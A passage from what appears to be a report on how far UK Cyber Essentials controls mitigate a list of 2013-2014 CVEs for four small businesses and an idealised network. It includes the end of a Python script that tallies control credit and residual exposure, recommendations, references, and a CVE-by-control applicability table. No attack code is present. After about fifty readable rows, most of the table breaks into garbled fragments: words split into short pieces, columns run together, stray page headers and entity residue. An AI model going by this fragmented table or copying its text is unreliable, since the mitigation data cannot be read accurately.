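    """'Secure Configuration (Secure Browser)' -> 'Secure Configuration'.
    (This example's normalisation, so qualified variants count as one control.)"""
    return name.split(" (", 1)[0].strip()


def parse_rows(text: str) -> List[Row]:
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        cells = [c.strip() for c in line.split("|")]
        if len(cells) != 8:
            raise ValueError(f"expected 8 columns, got {len(cells)}: {line!r}")
        cve, flags, without_ce, with_ce = cells[0], cells[1:6], cells[6], cells[7]
        outcome, _, control_list = with_ce.partition(" - ")
        rows.append(Row(
            cve=cve,
            exposed={n: f.lower() == "y" for n, f in zip(NETWORKS, flags)},
            without_ce=without_ce,
            with_ce=outcome.strip(),
            controls=[base_control(c) for c in control_list.split(",") if c.strip()],
        ))
    return rows


def control_share(rows: List[Row]) -> Dict[str, float]:
    """Fraction of vulnerabilities for which each control is credited (fully or partially).
    This is how a figure like 'Patch Management aids in 87.5% of cases' is derived."""
    hits = Counter(c for r in rows for c in set(r.controls))
    return {c: n / len(rows) for c, n in hits.items()}


def outcome_counts(rows: List[Row]) -> Dict[str, int]:
    """How many vulnerabilities end up Mitigated / Partially Mitigated / Not Mitigated with CE."""
    return dict(Counter(r.with_ce for r in rows))


def residual_exposure(rows: List[Row], network: str) -> List[str]:
    """CVEs that a network actually runs and that CE does not fully mitigate.
    These are the items an SME still has to act on (per the report's conclusion,
    usually by not deploying the affected product)."""
    return [r.cve for r in rows if r.exposed[network] and r.with_ce != "Mitigated"]


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for control, share in sorted(control_share(rows).items(), key=lambda kv: -kv[1]):
        print(f"{control:22s} {share:6.1%}")
    print(outcome_counts(rows))
    for net in NETWORKS:
        print(net, residual_exposure(rows, net))
```

On the eight sample rows Secure Configuration is credited most often and Patch Management and Anti-Malware tie, which is not the ordering the full table gives; the point of the script is the residual-exposure list, which on this sample leaves SME 1 with two partially mitigated items while the idealised network has none.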
Recommendations
To further improve cyber security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] Department for Business, Innovation and Skills, CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation and Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.mitre.org. Terminology. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme: overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation and Skills. Common cyber attacks: reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160, aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271, aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077, aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy: protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

Columns: the CVE; whether each of SME 1 to 4 and the idealised network runs the affected product (y/n); the outcome with no Cyber Essentials controls in place (No CE); and the outcome with Cyber Essentials in place, followed by the controls credited with it (With CE).

CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-54
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-54
31
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-54
94
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
50
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
53
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-5
55
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
56
1n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-57
51
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-5
75
7n
nn
nm
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lC
VE
-20
13
-58
28
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 15 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-6
16
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lS
ecu
reC
on
fig
ura
tio
n(C
oo
kie-
del
etio
n)
CV
E-2
01
3-6
18
8y
yn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-62
84
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-6
39
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reS
erve
r)C
VE
-20
13
-64
75
ny
yn
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eF
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-66
60
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-66
99
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-6
70
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
3-6
97
9n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-6
99
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-7
00
4y
nn
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-7
04
3n
nn
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-F
irm
war
eM
anag
emen
tC
VE
-20
13
-73
89
yn
ny
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
F
irm
war
eM
anag
emen
tC
VE
-20
14
-00
01
yn
yn
nN
ot
Mit
igat
edM
itig
ated
-B
ou
nd
ary
Fir
ewal
lsin
clu
de
anti
-DO
SC
VE
-20
14
-00
35
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
SL
CV
E-2
01
4-0
16
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-0
20
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
SS
LC
VE
-20
14
-02
32
yy
yn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
14
-02
59
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
ampP
atch
Man
agem
ent
CV
E-2
01
4-0
26
6y
yy
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
4-0
29
4n
ny
ny
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
A
nti
-Mal
war
eC
VE
-20
14
-03
13
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
14
-03
54
yn
ny
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n
Fir
mw
are
Man
agem
ent
CV
E-2
01
4-0
36
2y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
ramp
Web
Ho
stin
g)
CV
E-2
01
4-0
43
3y
yy
ny
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
88
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-04
93
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
94
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-04
98
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
15
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
33
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
53
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lC
VE
-20
14
-05
62
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-05
77
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Acc
ess
Co
ntr
ol
CV
E-2
01
4-0
76
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
76
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-0
78
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
amen
tS
ecu
reC
on
fig
ura
tio
n(P
ort
clo
sin
g)
CV
E-2
01
4-1
33
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Web
site
Bla
cklis
tin
gC
VE
-20
14
-13
42
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-1
34
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
Acc
ess
Co
ntr
ol
CV
E-2
01
4-1
35
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Mal
war
eP
rote
ctio
n
Pat
chM
anag
emen
tC
VE
-20
14
-13
79
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-M
alw
are
Pro
tect
ion
P
atch
Man
agem
ent
CV
E-2
01
4-1
37
9n
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
14
-13
82
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
list
Pat
chM
anag
emen
tC
VE
-20
14
-14
66
yn
nn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
t
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 16 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-1
47
2y
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tP
atch
Man
agem
ent
CV
E-2
01
4-1
47
7y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
18
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
56
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-15
65
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
58
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
01
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-17
40
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agam
ent
CV
E-2
01
4-1
74
4y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-17
53
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
ampP
atch
Man
agem
ent
CV
E-2
01
4-1
80
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
08
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Web
site
Bla
cklis
tin
gamp
Pat
chM
anag
amen
tC
VE
-20
14
-18
11
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
CV
E-2
01
4-1
81
2y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Str
on
gP
assw
ord
s(U
ser
Acc
ess)
CV
E-2
01
4-2
01
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-2
10
3n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
SC
VE
-20
14
-21
09
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-2
36
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
41
6n
yy
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-2
55
4n
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tA
cces
sC
on
tro
lW
ebsi
teB
lack
listi
ng
CV
E-2
01
4-2
64
3n
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-27
42
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
An
tiD
OS
CV
E-2
01
4-2
76
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
89
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
79
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-27
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-2
80
8y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-28
21
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-3
44
4n
nn
yn
No
tM
itig
ated
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-34
89
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
(Use
rA
cces
s)C
VE
-20
14
-35
07
nn
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
ampP
atch
Man
agem
ent
CV
E-2
01
4-3
55
6y
ny
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-3
58
0y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
DO
S
Pat
chM
anag
emen
tC
VE
-20
14
-38
14
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
